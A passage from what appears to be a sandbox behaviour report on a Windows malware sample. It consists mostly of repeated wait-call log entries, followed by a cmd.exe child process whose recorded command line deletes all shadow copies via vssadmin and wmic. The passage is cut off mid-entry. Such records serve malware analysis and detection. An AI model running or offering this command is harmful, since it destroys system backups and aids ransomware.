dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.683] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.808] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0160.932] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.058] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.183] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.307] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.432] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.557] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.681] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.806] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0161.931] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.056] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.180] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.305] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.430] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.555] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.680] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.808] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0162.939] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.059] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.179] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.304] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.429] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.553] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.678] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.803] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0163.929] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.059] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.184] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.302] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.427] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.552] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.676] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.801] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0164.926] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.070] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.191] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.316] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.441] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.566] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.690] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.815] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0165.940] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.075] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.190] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.314] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.439] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.564] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.689] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.814] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0166.974] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.095] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.222] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.344] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.469] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.594] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.719] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.844] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0167.969] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.093] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.218] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.343] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.467] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.592] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.717] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.842] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0168.966] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.094] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.216] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.341] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.466] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.590] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.715] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.840] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0169.965] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.089] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.215] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.339] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.464] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.589] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.715] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.839] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0170.963] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.088] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.213] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.338] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.462] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.587] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.712] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.837] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0171.962] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.090] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.221] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.336] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.461] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.586] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.710] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.835] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0172.960] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.085] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.225] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.350] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.475] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.600] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.724] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.850] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0173.974] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.099] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.260] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.380] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.507] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.629] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.754] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0174.879] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.004] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.129] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.253] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.378] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.503] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.628] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.752] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0175.877] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.003] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.127] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.267] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.392] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.517] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.642] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.766] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0176.891] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.022] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.144] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.266] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.392] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.516] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.642] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.766] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0177.889] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.015] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.140] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.280] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.405] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.529] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.654] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.779] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0178.906] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.028] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.154] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.278] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.403] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.528] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.657] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.777] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0179.902] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.027] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.152] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.287] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.401] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.526] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.651] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0180.776] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0190.808] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.837] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0210.868] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.901] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0230.931] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0240.961] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.008] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.054] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.094] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) Thread: id = 156 os_tid = 0xa30 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x35c6d000" os_pid = "0xf84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xed8" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1110 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1111 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1112 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1113 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = 